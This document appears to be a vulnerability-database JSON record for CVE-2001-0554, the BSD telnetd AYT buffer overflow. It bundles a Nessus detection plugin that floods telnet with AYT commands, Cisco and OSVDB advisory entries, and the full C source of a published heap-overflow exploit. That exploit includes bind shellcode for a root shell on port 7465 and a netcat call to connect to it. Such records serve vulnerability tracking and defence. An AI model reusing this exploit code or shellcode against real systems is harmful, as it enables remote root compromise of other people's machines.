<noamr@beyondsecurity.com>.\n#\n# rd: tested against Solaris 2.8, RH Lx 6.2, FreeBSD 4.3 (patched & unpatched)\n\n# Changes by Tenable:\n# - Revised plugin title, changed family (8/19/09)\n\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(10709);\n script_version (\"1.34\");\n script_cve_id(\"CVE-2001-0554\");\n script_bugtraq_id(3064);\n \n script_name(english:\"BSD Based telnetd telrcv Function Remote Command Execution\");\n \n# http://www.team-teso.net/advisories/teso-advisory-011.tar.gz is dead\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote telnet server may be vulnerable to a buffer overflow\nattack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The Telnet server does not return an expected number of replies when\nit receives a long sequence of 'Are You There' commands. This\nprobably means it overflows one of its internal buffers and crashes. \nThis could likely lead to arbitrary code execution.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable the telnet service by, for example, commenting out the\n'telnet' line in /etc/inetd.conf.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2001/07/24\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2001/07/18\");\n script_cvs_date(\"Date: 2018/08/01 17:36:12\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n script_summary(english:\"Attempts to overflow the Telnet server buffer\");\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2001-2018 Pavel Kankovsky\");\n script_family(english:\"Gain a shell remotely\");\n # Must run AFTER ms_telnet_overflow-004.nasl\n script_dependencie(\"find_service1.nasl\", \"ms_telnet_overflow.nasl\");\n\n script_require_ports(\"Services/telnet\", 23);\n exit(0);\n}\n\n#\n# The script code starts here.\n#\ninclude('telnet_func.inc');\n\niac_ayt = raw_string(0xff, 0xf6);\niac_ao = raw_string(0xff, 0xf5);\niac_will_naol = raw_string(0xff, 0xfb, 0x08);\niac_will_encr = raw_string(0xff, 0xfb, 0x26);\n\n#\n# This helper function counts AYT responses in the input stream.\n# The input is read until 1. the expected number of responses is found,\n# or 2. EOF or read timeout occurs.\n#\n# At this moment, any occurence of \"Yes\" or \"yes\" is supposed to be such\n# a response. Of course, this is wrong: some FreeBSD was observed to react\n# with \"load: 0.12 cmd: .log 20264 [running] 0.00u 0.00s 0% 620k\"\n# when the telnet negotiation have been completed. Unfortunately, adding\n# another pattern to this code would be too painful (hence the negotiation\n# tricks in attack()).\n#\n# In order to avoid an infinite loop (when testing a host that generates\n# lots of junk, intentionally or unintentionally), I stop when I have read\n# more than 100 * max bytes.\n#\n# Please note builtin functions like ereg() or egrep() cannot be used\n# here (easily) because they choke on '\\0' and many telnet servers send\n# this character\n#\n# Local variables: num, state, bytes, a, i, newstate\n#\n\nfunction count_ayt(sock, max) {\n local_var a, bytes, i, newstate, num, state;\n\n num = 0; state = 0;\n bytes = 100 * max;\n while (bytes >= 0) {\n a = recv(socket:sock, length:1024);\n if (!a) return (num);\n bytes = bytes - strlen(a);\n for (i = 0; i < strlen(a); i = i + 1) {\n newstate = 0;\n if ((state == 0) && ((a[i] == \"y\") || (a[i] == \"Y\")))\n newstate = 1;\n if ((state == 1) && (a[i] == \"e\"))\n newstate = 2;\n if ((state == 2) && (a[i] == \"s\")) {\n # DEBUG display(\"hit \", a[i-2], a[i-1], a[i], \"\\n\");\n num = num + 1;\n if (num >= max) return (num);\n newstate = 0;\n }\n state = newstate;\n }\n }\n # inconclusive result\n return (-1);\n}\n\n#\n# This functions tests the vulnerability. \"negotiate\" indicates whether\n# full telnet negotiation should be performed using telnet_init().\n# Some targets might need it while others, like FreeBSD, fail to respond\n# to AYT in an expected way when the negotiation is done (cf. comments\n# accompanying count_ayt()).\n#\n# Local variables: r, total, size, bomb, succ\n#\n\nfunction attack(port, negotiate) {\n local_var bomb, r, size, soc, succ, total;\n\n succ = 0;\n soc = open_sock_tcp(port);\n if (!soc) return (0);\n if (negotiate)\n # standard negotiation\n r = telnet_negotiate(socket:soc);\n else {\n # wierd BSD magic, is is necessary?\n send(socket:soc, data:iac_will_naol);\n send(socket:soc, data:iac_will_encr);\n r = 1;\n }\n if (r) {\n # test whether the server talks to us at all\n # and whether AYT is supported\n send(socket:soc, data:iac_ayt);\n r = count_ayt(sock:soc, max:1);\n # DEBUG display(\"probe \", r, \"\\n\");\n if (r >= 1) { \n # test whether too many AYT's make the server die\n total = 2048; size = total * strlen(iac_ayt);\n bomb = iac_ao + crap(length:size, data:iac_ayt);\n send(socket:soc, data:bomb);\n r = count_ayt(sock:soc, max:total);\n # DEBUG\n#display(\"attack \", r, \" expected \", total, \"\\n\");\n if ((r >= 0) && (r < total - 4)) succ = 1;\n }\n }\n close(soc);\n return (succ);\n}\n\n#\n# The main program.\n#\n\nport = get_kb_item(\"Services/telnet\");\nif (!port) port = 23;\n\nif (get_port_state(port)) {\n banner = get_telnet_banner(port:port);\n if (\"Welcome to Microsoft Telnet Service\" >< banner) exit(0);\n\n success = attack(port:port, negotiate:0);\n if (success <= 0) success = attack(port:port, negotiate:1);\n if (success > 0) security_hole(port);\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T15:30:21", "description": "Solaris 2.x/7.0/8,IRIX 6.5.x,OpenBSD 2.x,NetBSD 1.x,Debian 3,HP-UX 10 Telnetd Buffer Overflow. CVE-2001-0554. Remote exploit for unix platform", "published": "2001-07-18T00:00:00", "type": "exploitdb", "title": "Solaris 2.x/7.0/8,IRIX 6.5.x,OpenBSD 2.x,NetBSD 1.x,Debian 3,HP-UX 10 Telnetd Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0554"], "modified": "2001-07-18T00:00:00", "id": "EDB-ID:21018", "href": "https://www.exploit-db.com/exploits/21018/", "sourceData": "source: http://www.securityfocus.com/bid/3064/info\r\n\r\nA boundary condition error exists in telnet daemons derived from the BSD telnet daemon.\r\n\r\nUnder certain circumstances, the buffer overflow can occur when a combination of telnet protocol options are received by the daemon. The function responsible for processing the options prepares a response within a fixed sized buffer, without performing any bounds checking.\r\n\r\nThis vulnerability is now being actively exploited. A worm is known to be circulating around the Internet. \r\n\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#include <stdio.h>\r\n#include <fcntl.h>\r\n\r\n/*********************************************************************\r\n Proof of concept netkit-0.17-7 local root exploit.\r\n\r\n Exploits buffer overflow in the AYT handling of in.telnetd, \r\n due to bad logic in the handling of snprintf(), and \r\n\r\n TESO advisory details were enough to allow me to put \r\n controlable addresses in arbitary heap locations. \r\n\r\n Heap based exploit. Overflow allows rewriting of some heap \r\n data, which allowed me to put a new heap structure in the \r\n input buffer, which let me do whatever I want.\r\n\r\n'traceroute exploit story - By Dvorak, Synnergy Networks' was very\r\n helpful. Also malloc.c was good. \r\n\r\n*********************************************************************/\r\n/*\r\n Notes about exploit \r\n\r\n1) RedHat 7.0, exploiting localhost\r\n2) hostname is clarity.local\r\n3) It probably won't work without at least a different setting for\r\n the --size option, and probably the --name option as well. The\r\n --name arguemnt is the hostname part of the string that gets \r\n returned by the AYT command, which may be different to the name\r\n of the address you are connecting to..\r\n4) There are a lot of things that use the heap, making the size \r\n depend on alot of factors. \r\n\r\n5) You will might need to change some (or all) of the offsets. \r\n This program does allow you to brute force, if the hostname returned \r\n by the AYT command is not a multiple of 3 letters long.\r\n \r\n It is also possibly (at least according to some quick testing I did)\r\n exploitable on some (all?) servers with names that are multiples of three\r\n letters long, using the Abort Output command to add 2 characters to the\r\n output length, and exploit the heap in a similar manner to this method.\r\n \r\n (You can only directly put user controlable characters in 2 out of 3\r\n locations (ie: no AO will give you a multiple of 3 bytes on the heap, AO\r\n will give you 2 more than a multiple of 3 bytes) with controllable\r\n characters, but when you count the null added by the netoprintf(), and use\r\n 0 as an option to a do or will, you can sometimes create valid chunks that\r\n point to locations you can control. I have only tested this method with a \r\n simulation, but it seems it would probably work with the telnetd as well.\r\n I will look into it when I have time. Maybe.)\r\n \r\n\r\n . . _ _ _ _ . . _ _ _ . .\r\n |_ _|_ _|_ _ . / / |\\/| |_| _| | | ||\\/| / | | ||_ | |\r\n | | | | |_|. / / | | | _|.|_ |_|| | / |_ |_| _| \\/ \r\n |\r\n *********************************************************************/\r\n\r\n\r\n\r\n\r\n#define SERVER_PORT 23\r\n\r\n#define ENV 18628\r\n\r\nint offset12[] = {\r\n// netibuf[343]->the chunk start.\r\n -4, 0xaa,\r\n -5, 0xbb,\r\n -6, 0xcc,\r\n -7, 0x10,\r\n -9, 0xdd,\r\n -10, 0x68,\r\n -12, 0xee,\r\n -13, 0x88,\r\n -14, 0x99,\r\n 0, 0x00\r\n};\r\n\r\nint offset3[]={\r\n-1,0x00,\r\n0,0\r\n};\r\n\r\nint *offsets=offset12;\r\n\r\n\r\nint dalen = 0;\r\nint big;\r\nint small;\r\nint mipl = 0;\r\nint ninbufoffset;\r\nchar spinchars[] = \"/|\\\\-\";\r\n\r\nchar tosend[] = {\r\n 0xff, 0xfd, 0x03, 0xff, 0xfb, 0x18, 0xff, 0xfb, 0x1f, 0xff, 0xfb, 0x20,\r\n 0xff, 0xfb, 0x21, 0xff, 0xfb, 0x22, 0xff, 0xfb, 0x27, 0xff, 0xfd, 0x05,\r\n 0xff, 0xfb, 0x23, 0\r\n};\r\n\r\nchar lamagra_bind_code[] =\r\n// the NOPs are my part... to jump over the modified places, \r\n// without me having to take a look to see where they are.\r\n// Modified to listen on 7465 == TAGS and work thru TELNET protocol.\r\n \"\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\"\r\n \"\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\"\r\n \"\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\"\r\n \"\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\"\r\n \"\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\"\r\n \"\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x89\\xe5\\x31\\xd2\\xb2\\x66\\x89\\xd0\\x31\\xc9\\x89\\xcb\\x43\\x89\\x5d\\xf8\"\r\n \"\\x43\\x89\\x5d\\xf4\\x4b\\x89\\x4d\\xfc\\x8d\\x4d\\xf4\\xcd\\x80\\x31\\xc9\\x89\"\r\n \"\\x45\\xf4\\x43\\x66\\x89\\x5d\\xec\\x66\\xc7\\x45\\xee\\x1d\\x29\\x89\\x4d\\xf0\"\r\n \"\\x8d\\x45\\xec\\x89\\x45\\xf8\\xc6\\x45\\xfc\\x10\\x89\\xd0\\x8d\\x4d\\xf4\\xcd\"\r\n \"\\x80\\x89\\xd0\\x43\\x43\\xcd\\x80\\x89\\xd0\\x43\\xcd\\x80\\x89\\xc3\\x31\\xc9\"\r\n \"\\xb2\\x3f\\x89\\xd0\\xcd\\x80\\x89\\xd0\\x41\\xcd\\x80\\xeb\\x18\\x5e\\x89\\x75\"\r\n \"\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x45\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4d\\x08\"\r\n \"\\x8d\\x55\\x0c\\xcd\\x80\\xe8\\xe3\"\r\n \"\\xff\\xff\\xff\\xff\\xff\\xff/bin/sh\";\r\n\r\nchar *shellcode = lamagra_bind_code;\r\n\r\nint sock;\t\t\t/* fd for socket connection */\r\nFILE *dasock;\t\t\t/* for doing fprint et al */\r\nstruct sockaddr_in server;\t/* the server end of the socket */\r\nstruct hostent *hp;\t\t/* Return value from gethostbyname() */\r\nchar buf[40960];\t\t/* Received data buffer */\r\nchar sock_buf[64 * 1024];\t/* Received data buffer */\r\n\r\nchar daenv[10000];\r\nchar oldenv[10000];\r\n\r\nextern int errno;\r\nread_sock ()\r\n{\r\n /* Prepare our buffer for a read and then read. */\r\n bzero (buf, sizeof (buf));\r\n if (read (sock, buf, sizeof (buf)) < 0)\r\n if (errno != 11)\r\n {\r\n\tperror (\"! Socket read\");\r\n\texit (1);\r\n }\r\n}\r\n\r\nsock_setup ()\r\n{\r\n int flags;\r\n int yes = 1;\r\n if ((sock = socket (AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n perror (\"! Error making the socket\\n\");\r\n exit (1);\r\n }\r\n bzero ((char *) &server, sizeof (server));\r\n server.sin_family = AF_INET;\r\n if ((hp = gethostbyname (\"localhost\")) == NULL)\r\n {\r\n fprintf (stderr, \"! localhost unknown??\\n\");\r\n exit (1);\r\n }\r\n bcopy (hp->h_addr, &server.sin_addr, hp->h_length);\r\n server.sin_port = htons ((u_short) SERVER_PORT);\r\n\r\n /* Try to connect */\r\n if (connect (sock, (struct sockaddr *) &server, sizeof (server)) < 0)\r\n {\r\n perror (\"! Error connecting\\n\");\r\n exit (1);\r\n }\r\n\r\n dasock = (FILE *) fdopen (sock, \"w+\");\r\n if (!dasock)\r\n {\r\n perror (\"! Bad fdopen happened\");\r\n exit (1);\r\n }\r\n\r\n/****************************************\r\n Thanks to xphantom for the next 4 lines.\r\n (which i don't need anymore ;? )\r\n \r\n flags = fcntl(sock, F_GETFL, 0); \r\n flags |= O_NONBLOCK; \r\n fcntl(sock, F_SETFL, flags);\r\n if (setsockopt(sock, SOL_SOCKET, SO_OOBINLINE, &yes,sizeof(yes)) == -1) {\r\n perror(\"setsockopt\");\r\n exit(1);\r\n } \r\n*****************************************/\r\n\r\n\r\n setbuffer (dasock, sock_buf, 64 * 1024);\r\n\r\n}\r\n\r\ndo_iac (char c)\r\n{\r\n putc (0xff, dasock);\r\n putc (c, dasock);\r\n}\r\n\r\ndo_ayt ()\r\n{\r\n do_iac (0xf6); // sets buffer length to 2\r\n}\r\n\r\ndoo (char c)\r\n{\r\n putc (255, dasock);\r\n putc (253, dasock);\r\n putc (c, dasock);\r\n}\r\nwill (char c)\r\n{\r\n putc (255, dasock);\r\n putc (251, dasock);\r\n putc (c, dasock);\r\n}\r\nwont (char c)\r\n{\r\n putc (255, dasock);\r\n putc (252, dasock);\r\n putc (c, dasock);\r\n}\r\n\r\nvoid\r\nsolve (int remain)\r\n{\r\n int x, y;\r\n big = -100;\r\n small = -100;\r\n for (x = 0; x < 120; x++)\r\n for (y = 2; y < 80; y++)\r\n {\r\n\tif (((y * 3) + (x * dalen)) == remain)\r\n\t {\r\n\t big = x;\r\n\t small = y;\r\n\t return;\r\n\t }\r\n }\r\n fprintf (stderr, \"I still can't work it out.\\n\\n\");\r\n exit (1);\r\n}\r\n\r\npush_clean ()\r\n{\r\n int l;\r\n for (l = 0; l < 8192; l++)\r\n putc (0, dasock);\t\r\n}\r\n\r\npush_heap_attack ()\r\n{\r\n int l;\r\n int shaddr = 0x805c970;\r\n int overwrite = 0x08051e78;\t// fopen\r\n int tosend[] = {\r\n 0x805670eb,\r\n 0x8,\r\n shaddr,\r\n shaddr,\r\n 0x0,\r\n 0x0,\r\n overwrite - 12,\r\n shaddr\r\n };\r\n fwrite (shellcode, strlen (shellcode), 1, dasock);\r\n for (l = strlen (shellcode); l < 289 + ninbufoffset; l++)\r\n putc (0, dasock);\r\n fwrite (tosend, 8, 4, dasock);\r\n fflush (dasock);\r\n}\r\n\r\nfill2 (int count, char with, int real)\r\n{\r\n int l;\r\n int first, rest, find;\r\n\r\n first = (int) (count / dalen) - 10;\r\n rest = (int) (((count) % dalen) / 3) * 3;\r\n find = count - ((first * dalen) + (rest * 3));\r\n solve (find);\r\n first += big;\r\n rest += small;\r\n for (l = 0; l < first; l++)\r\n do_ayt ();\r\n for (l = 0; l < rest; l++)\r\n will (with);\r\n if (real == 1)\r\n {\r\n push_clean ();\r\n }\r\n}\r\n\r\nfill (int count, char with)\r\n{\r\n fprintf (stderr, \" o Length %d char %d (%02x)\\n\",\r\n\t count, with & 0xff, with & 0xff);\r\n fflush (stderr);\r\n fill2 (8257, 'z', 0);\t\t// first part\r\n fill2 (count - 8257, with, 1);\t// do it for real\r\n}\r\n\r\ndoenv (char *danam, char *daval)\r\n{\r\n sprintf (daenv, \"%c%c%c%c%c%s%c%s%c%c\",\r\n /* IAC SB N-E IS VAR name VAL value IAC SE */\r\n\t 255, 250, 39, 0, 0, danam, 1, daval, 255, 240);\r\n\r\n fwrite (daenv, 512, 1, dasock);\r\n fflush (dasock);\r\n}\r\n\r\nmain (int argc, char *argv[])\r\n{\r\n int br, l, dosleep = 0;\r\n int percent = 0;\r\n char spin;\r\n unsigned char w;\r\n bzero (oldenv, sizeof (oldenv));\r\n argv++;\r\n dalen = strlen (\"clarity.local\");\r\n while (argv[0])\r\n {\r\n if (!strcmp (argv[0], \"--pause\"))\r\n\tdosleep = 1;\r\n\r\n if (!strcmp (argv[0], \"--size\") && argv[1])\r\n\t{\r\n\t mipl = atoi (argv[1]);\r\n\t argv++;\r\n\t}\r\n\r\n if (!strcmp (argv[0], \"--name\") && argv[1])\r\n\t{\r\n\t dalen = strlen (argv[1]);\r\n\t argv++;\r\n\t}\r\n argv++;\r\n }\r\n fprintf (stderr, \" o MiPl of %4d o NameLen of %2d\\n\", mipl, dalen);\r\n if(dalen%3==0)\r\n {\r\n offsets=offset3;\r\n }\r\n else\r\n {\r\n ninbufoffset = mipl % 8192;\r\n offsets[11] += 32 * (mipl - ninbufoffset) / 8192;\r\n if (offsets[11] > 255)\r\n {\r\n fprintf (stderr, \" ! MiPl too big.\", mipl, dalen);\r\n exit (1);\r\n }\r\n }\r\n sock_setup ();\r\n if (dosleep)\r\n {\r\n system (\"sleep 1;ps aux|grep in.telnetd|grep -v grep\");\r\n sleep (8);\r\n }\r\n\r\n dalen += strlen (\"\\r\\n[ : yes]\\r\\n\");\r\n fprintf (stderr, \"o Sending IAC WILL NEW-ENVIRONMENT...\\n\");\r\n fflush (stderr);\r\n doo (5);\r\n will (39);\r\n fflush (dasock);\r\n read_sock ();\r\n fprintf (stderr, \"o Setting up environment vars...\\n\");\r\n fflush (stderr);\r\n will (1);\r\n push_clean ();\r\n doenv (\"USER\", \"zen-parse\");\r\n doenv (\"TERM\", \"zen-parse\");\r\n will (39);\r\n fflush (dasock);\r\n fprintf (stderr, \"o Doing overflows...\\n\");\r\n fflush (stderr);\r\n for (br = 0; (offsets[br] || offsets[br + 1]); br += 2)\r\n {\r\n fill (mipl + ENV + offsets[br], offsets[br + 1]);\r\n fflush (dasock);\r\n usleep (100000);\r\n read_sock ();\r\n }\r\n fprintf (stderr, \"o Overflows done...\\n\");\r\n fflush (stderr);\r\n push_clean ();\r\n\r\n fprintf (stderr, \"o Sending IACs to start login process...\\n\");\r\n fflush (stderr);\r\n wont (24);\r\n wont (32);\r\n wont (35);\r\n fprintf (dasock, \"%s\", tosend);\r\n will (1);\r\n push_heap_attack ();\r\n sleep (1);\r\n fprintf (stderr, \"o Attempting to lauch netcat to localhost rootshell\\n\");\r\n execlp (\"nc\", \"nc\", \"-v\", \"localhost\", \"7465\", 0);\r\n fprintf (stderr,\r\n\t \"o If the exploit worked, there should be an open port on 7465.\\n\");\r\n fprintf (stderr, \" It is a root shell. You should probably close it.\\n\");\r\n fflush (stderr);\r\n sleep (60);\r\n exit (0);\r\n}\r\n/********************************************************************\r\n\r\n Thanks to xphantom for the help with getting the some of the socket \r\n stuff working properly. Erm. I didn't end up using that method, but\r\n thanks anyway. ;]\r\n\r\nThis code is Copyright (c) 2001 zen-parse\r\nUse and distribution is unlimited, provided the code is not modified.\r\nIf the code, including any of text is modified, that version may not\r\nbe redistrubuted.\r\n\r\n********************************************************************/\r\n/* ObPlug 4 My Band: gone platinum, Chapel of Stilled voices, from */\r\n/********************************************************************\r\n Remember to visit Chapel of Stilled Voices:\r\n _ _ _ . .\r\n |_ _|_ _|_ _ . / /. . _ _| _ _ . . / | _ |_ | |\r\n | | | | |_|. / / |\\/| |_| _|.|_ |_||\\/| / |_ |_| _| \\/ \r\n - - - - - - -|- - - - - - -|- - - - - - - - - - - - - - - - - -\r\n | |\r\nIf there is anything below the next line someone is not following the\r\nrules. --zen-parse\r\n************************************END*****************************/\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/21018/"}], "cisco": [{"lastseen": "2020-12-24T11:42:15", "bulletinFamily": "software", "cvelist": ["CVE-2001-0554"], "description": "", "modified": "2002-09-03T15:00:00", "published": "2002-09-03T15:00:00", "id": "CISCO-SA-20020903-VPN3K-VULNERABILITY", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20020903-vpn3k-vulnerability", "type": "cisco", "title": "Cisco VPN 3000 Concentrator Multiple Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T11:42:16", "bulletinFamily": "software", "cvelist": ["CVE-2001-0554"], "description": "", "modified": "2002-01-29T15:00:00", "published": "2002-01-29T15:00:00", "id": "CISCO-SA-20020129-CATOS-TELRCV", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20020129-catos-telrcv", "type": "cisco", "title": "Cisco CatOS Telnet Buffer Vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-2001-0554"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in multiple BSD-based telnet daemons. The 'telrcv' function fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nContact your vendor for an appropriate upgrade. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in multiple BSD-based telnet daemons. The 'telrcv' function fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\n[Vendor Specific Advisory URL](http://www.securityfocus.com/advisories/3610)\n[Vendor Specific Advisory URL](http://archives.neohapsis.com/archives/bugtraq/2001-07/0776.html)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20010801-01-P)\n[Vendor Specific Advisory URL](http://www.securityfocus.com/advisories/3543)\n[Vendor Specific Advisory URL](ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2001-012.txt.asc)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/security/OpenLinux/CSSA-2001-030.0.txt)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200410-03.xml)\n[Vendor Specific Advisory URL](http://web.mit.edu/kerberos/www/advisories/telnetd.txt)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2001:093)\n[Vendor Specific Advisory URL](http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000413)\n[Vendor Specific Advisory URL](http://www.cisco.com/warp/public/707/catos-telrcv-vuln-pub.shtml)\n[Vendor Specific Advisory URL](http://www.cisco.com/warp/public/707/vpn3k-multiple-vuln-pub.shtml)\n[Vendor Specific Advisory URL](http://www.debian.org/security/2001/dsa-070)\n[Vendor Specific Advisory URL](http://www.debian.org/security/2001/dsa-075)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2001:068)\n[Vendor Specific Advisory URL](http://rhn.redhat.com/errata/RHSA-2001-099.html)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=25631)\n[Vendor Specific Advisory URL](ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:49.telnetd.asc)\n[Vendor Specific Advisory URL](http://rhn.redhat.com/errata/RHSA-2001-100.html)\nSnort Signature ID: 1252\nSnort Signature ID: 1253\nOther Advisory URL: http://archives.neohapsis.com/archives/bugtraq/2001-07/att-0611/01-spadv03.txt\nOther Advisory URL: http://archives.neohapsis.com/archives/bugtraq/2001-07/0351.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-09/0631.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2001-07/0562.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2001-07/0559.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2001-07/0599.html\nISS X-Force ID: 6875\n[CVE-2001-0554](https://vulners.com/cve/CVE-2001-0554)\nCIAC Advisory: l-128\nCIAC Advisory: l-131\nCIAC Advisory: l-124\nCIAC Advisory: m-006\nCERT VU: 745371\nCERT: CA-2001-21\nBugtraq ID: 3064\n", "modified": "2001-07-18T00:00:00", "published": "2001-07-18T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:809", "id": "OSVDB:809", "title": "Multiple BSD Telnet Option Handling Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:05", "bulletinFamily": "software", "cvelist": ["CVE-2004-0911", "CVE-2001-0554"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in netkit-telnetd. The telnet daemon has an error within the processing of AYT (\"Are You There\") commands and may cause an invalid pointer to be freed resulting in a buffer overflow. With a specially crafted request, an attacker may cause a denial of servce or potentially execute arbitrary code resulting in a loss of integrity and/or availability.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in netkit-telnetd. The telnet daemon has an error within the processing of AYT (\"Are You There\") commands and may cause an invalid pointer to be freed resulting in a buffer overflow. With a specially crafted request, an attacker may cause a denial of servce or potentially execute arbitrary code resulting in a loss of integrity and/or availability.\n## References:\n[Vendor Specific Advisory URL](http://www.debian.org/security/2004/dsa-569)\n[Secunia Advisory ID:12741](https://secuniaresearch.flexerasoftware.com/advisories/12741/)\n[Secunia Advisory ID:14750](https://secuniaresearch.flexerasoftware.com/advisories/14750/)\n[Secunia Advisory ID:12608](https://secuniaresearch.flexerasoftware.com/advisories/12608/)\n[Secunia Advisory ID:12864](https://secuniaresearch.flexerasoftware.com/advisories/12864/)\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200410-03.xml\nOther Advisory URL: http://www.debian.org/security/2004/dsa-556\nOther Advisory URL: http://www.ubuntulinux.org/support/documentation/usn/usn-101-1\nMail List Post: http://www.securityfocus.com/archive/1/375743\nISS X-Force ID: 17540\n[CVE-2004-0911](https://vulners.com/cve/CVE-2004-0911)\n[CVE-2001-0554](https://vulners.com/cve/CVE-2001-0554)\nBugtraq ID: 11313\n", "modified": "2004-10-06T03:48:09", "published": "2004-10-06T03:48:09", "href": "https://vulners.com/osvdb/OSVDB:10531", "id": "OSVDB:10531", "type": "osvdb", "title": "netkit-telnetd AYT Command Memory Handling Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
